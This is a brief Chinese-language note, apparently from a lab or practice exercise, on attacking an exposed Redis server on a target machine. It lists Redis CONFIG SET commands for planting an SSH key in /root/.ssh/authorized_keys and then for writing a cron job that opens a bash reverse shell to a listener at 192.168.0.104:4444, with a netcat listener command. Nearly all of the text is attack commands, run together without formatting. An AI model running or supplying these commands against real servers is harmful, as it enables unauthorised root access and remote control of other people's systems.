首先获取备份路径,先连接靶机server config get dir //得到redis备份的路径其次更改redis公钥服务器路径为/root/.ssh config set dir /root/.ssh 设置上传公钥的备份文件名字为authorized_keys config set dbfilename authorized_keys更改1.txt文件为authorized_keys config set dbfilename 保存后连接靶机(暂时没成功) ssh -i 本机私钥 root@靶机ip 利用crontab反弹shell
权限足够,利用reids写入文件到计划任务目录下执行。
首先进行端口监听。
nc -lvnp 4444 连接redis,写入反弹shellredis-cli -h 192.168.48.128set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.104/4444 0>&1\n\n"config set dir /var/spool/cronconfig set dbfilename rootsave